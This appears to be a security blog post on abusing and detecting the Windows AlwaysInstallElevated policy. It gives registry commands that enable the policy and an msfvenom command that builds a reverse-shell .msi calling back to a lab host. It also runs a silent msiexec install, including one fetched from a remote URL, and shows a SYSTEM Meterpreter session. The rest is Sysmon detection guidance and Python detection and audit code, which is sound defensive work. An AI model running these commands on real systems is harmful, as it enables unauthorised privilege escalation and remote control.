Detecting AlwaysInstallElevated Policy Abuse — Windows PrivEsc

Ankith Bharadwaj
Apr 1, 2023

AlwaysInstallElevated is a Windows Group Policy setting that lets any user install Windows Installer packages (.msi files) with elevated (SYSTEM) privileges. The intent is to let unprivileged users install software that needs SYSTEM privileges.

This feature can be abused by threat actors for privilege escalation: a malicious .msi package is crafted and executed, and its payload runs as SYSTEM.

A further advantage of this technique is that .msi packages are executed by msiexec.exe, a digitally signed Microsoft binary (System Binary Proxy Execution: Msiexec), so the malicious code is proxied through a trusted process.

Enabling AlwaysInstallElevated Policy Setting

For demonstration purposes, we’ll use the Local Group Policy Editor to enable the setting manually on a single host, at both of the paths shown below. In an AD enterprise environment this setting could just as well be deployed as a GPO to many users/hosts.

Computer Configuration > Administrative Templates > Windows Components > Windows Installer
User Configuration > Administrative Templates > Windows Components > Windows Installer

Since Group Policy settings are stored as registry entries, the same change can be made by creating the Installer subkey and adding the value with the “Name” and “Data” shown below, using the “reg add” command. Both the machine (HKLM) and the user (HKCU) value must be set for the policy to take effect:

C:\Users\ankit\Desktop>reg ADD HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD
The operation completed successfully.

C:\Users\ankit\Desktop>reg ADD HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD
The operation completed successfully.

The above changes can be verified using the “reg query” command:

C:\Users\ankith>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

C:\Users\ankith>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
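As an added example (not from the post), the Python below parses “reg query” output for both hives and reports whether the policy is actually in effect, which requires a non-zero AlwaysInstallElevated value under both HKLM and HKCU. On a Windows host it runs reg.exe itself (the assumption being that reg.exe is on PATH); elsewhere it falls back to constructed sample output shaped like the snippets above, so it can be used for a fleet audit where reg query output is collected centrally.

```python
import re
import subprocess
import sys
from typing import Optional

# Policy key in both hives; the policy is only effective when BOTH carry a non-zero value
POLICY_KEYS = {
    "HKLM": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer",
    "HKCU": r"HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer",
}
VALUE_NAME = "AlwaysInstallElevated"

# Matches the value line printed by 'reg query ... /v AlwaysInstallElevated', e.g.
#     AlwaysInstallElevated    REG_DWORD    0x1
_VALUE_LINE_RE = re.compile(
    r"^\s*" + re.escape(VALUE_NAME) + r"\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$",
    re.MULTILINE,
)


def parse_reg_query(output: str) -> Optional[int]:
    """Return the DWORD from reg query output, or None when the key/value is absent
    (reg.exe then prints an ERROR line and no value line)."""
    match = _VALUE_LINE_RE.search(output)
    return int(match.group(1), 16) if match else None


def policy_enabled(hklm_output: str, hkcu_output: str) -> bool:
    """True only when both the machine and the user value are present and non-zero."""
    return bool(parse_reg_query(hklm_output)) and bool(parse_reg_query(hkcu_output))


def query_live(hive: str) -> str:
    """Run reg.exe on a Windows host (assumption: reg.exe is on PATH).
    A missing key yields a non-zero exit and empty stdout, which parses as None."""
    result = subprocess.run(
        ["reg", "query", POLICY_KEYS[hive], "/v", VALUE_NAME],
        capture_output=True, text=True,
    )
    return result.stdout


# Constructed sample outputs, shaped like the reg query output quoted above
SAMPLE_HKLM_ENABLED = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_HKCU_DISABLED = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x0
"""
SAMPLE_HKCU_MISSING = "ERROR: The system was unable to find the specified registry key or value."


def audit(hklm_output: str, hkcu_output: str) -> str:
    """One-line verdict suitable for an audit report."""
    hklm, hkcu = parse_reg_query(hklm_output), parse_reg_query(hkcu_output)
    verdict = "EXPOSED" if policy_enabled(hklm_output, hkcu_output) else "ok"
    return f"{verdict}: HKLM={hklm} HKCU={hkcu}"


if __name__ == "__main__":
    if sys.platform == "win32":
        print(audit(query_live("HKLM"), query_live("HKCU")))
    else:
        print(audit(SAMPLE_HKLM_ENABLED, SAMPLE_HKCU_DISABLED))
        print(audit(SAMPLE_HKLM_ENABLED, SAMPLE_HKCU_MISSING))
```

Note that a host where only one hive is set is reported as “ok” here because the policy is not effective, but it is still a misconfiguration worth cleaning up, since a single further value write makes it exploitable.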

Creating .msi Payload

An .msi reverse shell payload can be generated with Metasploit’s msfvenom (here carrying a Meterpreter payload), which supports .msi as an output format (-f msi).

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=443 -e x86/shikata_ga_nai -f msi -o payload.msi

Assuming initial access on the victim host, the payload is executed using msiexec:

C:\Users\ankit\Desktop\Payloads>msiexec /quiet /qn /i payload.msi

Checking privileges on our reverse shell, we see it running as SYSTEM:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.9:443
[*] Sending stage (175174 bytes) to 192.168.1.5
[*] Sending stage (175174 bytes) to 192.168.1.7
[*] Meterpreter session 4 opened (192.168.1.9:443 -> 192.168.1.5:51698) at 2023-03-31 14:12:51 -0400
[*] Meterpreter session 5 opened (192.168.1.9:443 -> 192.168.1.7:1784) at 2023-03-31 14:12:51 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Msiexec can also fetch packages from remote web servers, typically indicated by http:// or https:// in the file-location portion of the command line. This lets adversaries stage files on a remote web server and have msiexec download and run them:

C:\Users\ankith>msiexec /qn /i http://192.168.1.9:80/payload.msi

Detection & Hunting

We’ll use Sysmon logs to identify the criteria on which detections can be built. The first point applies specifically to the technique under discussion; the rest apply to msiexec detections in general:

1. Registry Events

Since the prerequisite for abuse is that the Installer registry key exists with the relevant Name/Data values, registry monitoring can alert whenever this setting is added, whether by admins or by users.

As a best-practice effort, historical events recording these registry changes can be identified and the affected hosts remediated.

The snippet below shows Sysmon Event ID 13: RegistryEvent (Value Set).

Registry value set:
RuleName: AlwaysInstallElevated
EventType: SetValue
UtcTime: 2023-03-31 19:14:06.766
ProcessGuid: {ac6a4e42-30fe-6427-3d02-000000006500}
ProcessId: 4856
Image: C:\WINDOWS\system32\reg.exe
TargetObject: HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
Details: DWORD (0x00000001)

2. Network Connections

When msiexec downloads a remote payload from an http:// or https:// file location, it generates a network connection event (Sysmon Event ID 3) as seen below. Since this behaviour is uncommon, it is worth hunting for and reviewing msiexec remote downloads in general.

These rules can be extended to similar network- and proxy-aware LOLBINs such as regsvr32.exe.

Network connection detected:
RuleName: -
UtcTime: 2023-04-01 11:39:30.814
ProcessGuid: {ac6a4e42-171e-6428-b700-000000006600}
ProcessId: 8952
Image: C:\Windows\System32\msiexec.exe
User: NT AUTHORITY\SYSTEM
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 192.168.1.7
SourceHostname: Sec504Student
SourcePort: 1600
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 192.168.1.9
DestinationHostname: -
DestinationPort: 80
DestinationPortName: http

On the same note, netflow/proxy logs can be used to alert on the “Windows Installer” User-Agent.

3. Process Monitoring/Cmdline Arguments

Command-line switches and keywords appearing in msiexec process executions (Sysmon Event ID 1) can be monitored for potentially suspicious activity.

  • /quiet — Specifies quiet mode.
  • /qn — Specifies that there is no UI during the installation process.
  • http:// or https:// — Used to download and execute a remote payload.

Process Create:
RuleName: -
UtcTime: 2023-04-01 13:13:54.707
ProcessGuid: {ac6a4e42-2e12-6428-7f01-000000006600}
ProcessId: 3100
Image: C:\Windows\System32\msiexec.exe
FileVersion: 5.0.17134.1 (WinBuild.160101.0800)
Description: Windows® installer
Product: Windows Installer - Unicode
Company: Microsoft Corporation
OriginalFileName: msiexec.exe
CommandLine: msiexec /qn /i http://192.168.1.9:80/payload.msi
CurrentDirectory: C:\Users\ankith\
User: <>
LogonGuid: {ac6a4e42-16d3-6428-11ce-030000000000}
LogonId: 0x3CE11
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=4767B71A318E201188A0D0A420C8B608,SHA256=F0B1D8B3ABCCFD6239521B8A114494B1AF0D4D3F89A75478E3535C18B100649D,IMPHASH=13C7ACE23F99CD5FBC3ABD5C16BF2DCE
ParentProcessGuid: {ac6a4e42-179b-6428-f500-000000006600}
ParentProcessId: 9004
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\WINDOWS\system32\cmd.exe"
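The three detection points above (registry value set, msiexec network connection, msiexec command line) as one piece of added example code, not from the post: a small parser for Sysmon events rendered as “Key: Value” text, the way they are quoted in this post, plus the three rules run over them. The sample events are trimmed from the snippets above, with one constructed benign local install added to show that it raises nothing; rule names, severities and the regsvr32.exe extension mentioned earlier are assumptions of this example, as is the inclusion of /q, which msiexec treats the same as /qn.

```python
import re
from typing import Dict, List, Tuple

Alert = Tuple[str, str, str]  # (rule, severity, ProcessId)

# Registry value that enables the policy (same suffix under HKLM and HKCU)
POLICY_VALUE_SUFFIX = r"\policies\microsoft\windows\installer\alwaysinstallelevated"
# Signed Microsoft binaries that can fetch and run content over HTTP (post: msiexec, regsvr32)
NETWORK_LOLBINS = {"msiexec.exe", "regsvr32.exe"}
# Silent-install switches: /quiet and /qn from the post, plus /q which msiexec treats as /qn
QUIET_SWITCH_RE = re.compile(r"(?i)(?:^|\s)/q(?:n|uiet)?(?=\s|$)")
REMOTE_URL_RE = re.compile(r"(?i)\bhttps?://\S+")


def parse_sysmon_text(block: str) -> Dict[str, str]:
    """Parse one Sysmon event rendered as 'Key: Value' lines, the form quoted in the post.
    The first line ('Process Create:' etc.) is kept as EventTitle."""
    lines = [ln.strip() for ln in block.strip().splitlines() if ln.strip()]
    event = {"EventTitle": lines[0].rstrip(":")}
    for line in lines[1:]:
        key, _, value = line.partition(":")  # first colon only: values contain ':' too
        event[key.strip()] = value.strip()
    return event


def _image_name(event: Dict[str, str]) -> str:
    return event.get("Image", "").rsplit("\\", 1)[-1].lower()


def _dword_nonzero(details: str) -> bool:
    """Details looks like 'DWORD (0x00000001)'; only a non-zero value enables the policy."""
    m = re.search(r"0x([0-9a-fA-F]+)", details)
    return bool(m) and int(m.group(1), 16) != 0


def evaluate(event: Dict[str, str]) -> List[Alert]:
    alerts: List[Alert] = []
    pid = event.get("ProcessId", "?")
    title = event.get("EventTitle", "")
    image = _image_name(event)
    if title == "Registry value set":                            # Sysmon EID 13
        target = event.get("TargetObject", "").lower()
        if target.endswith(POLICY_VALUE_SUFFIX) and _dword_nonzero(event.get("Details", "")):
            alerts.append(("AlwaysInstallElevated set to non-zero", "high", pid))
    elif title == "Network connection detected":                 # Sysmon EID 3
        if image in NETWORK_LOLBINS and event.get("Initiated", "").lower() == "true":
            alerts.append((f"{image} initiated outbound connection", "medium", pid))
    elif title == "Process Create" and image == "msiexec.exe":   # Sysmon EID 1
        cmd = event.get("CommandLine", "")
        if REMOTE_URL_RE.search(cmd):
            alerts.append(("msiexec install from remote URL", "high", pid))
        if QUIET_SWITCH_RE.search(cmd):
            alerts.append(("msiexec silent install switch", "low", pid))
    return alerts


def triage(blocks: List[str]) -> List[Alert]:
    return [alert for block in blocks for alert in evaluate(parse_sysmon_text(block))]


# Sample events: the first three are trimmed from the post's snippets, the last is constructed
REGISTRY_EVENT = r"""Registry value set:
EventType: SetValue
ProcessId: 4856
Image: C:\WINDOWS\system32\reg.exe
TargetObject: HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
Details: DWORD (0x00000001)
"""
NETWORK_EVENT = r"""Network connection detected:
ProcessId: 8952
Image: C:\Windows\System32\msiexec.exe
User: NT AUTHORITY\SYSTEM
Initiated: true
DestinationIp: 192.168.1.9
DestinationPort: 80
"""
PROCESS_EVENT = r"""Process Create:
ProcessId: 3100
Image: C:\Windows\System32\msiexec.exe
CommandLine: msiexec /qn /i http://192.168.1.9:80/payload.msi
ParentImage: C:\Windows\System32\cmd.exe
"""
BENIGN_EVENT = r"""Process Create:
ProcessId: 4242
Image: C:\Windows\System32\msiexec.exe
CommandLine: msiexec /i C:\Users\alice\Downloads\vendor-tool.msi
ParentImage: C:\Windows\explorer.exe
"""

if __name__ == "__main__":
    for rule, severity, pid in triage([REGISTRY_EVENT, NETWORK_EVENT, PROCESS_EVENT, BENIGN_EVENT]):
        print(f"[{severity:6}] pid={pid} {rule}")
```

The registry rule keys on TargetObject rather than on the RuleName field, so it fires even on a Sysmon configuration that has no dedicated rule for this value; the silent-switch rule is deliberately low severity on its own, because legitimate software deployment uses /qn constantly, and becomes interesting mainly in combination with a remote URL or an unexpected parent process.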
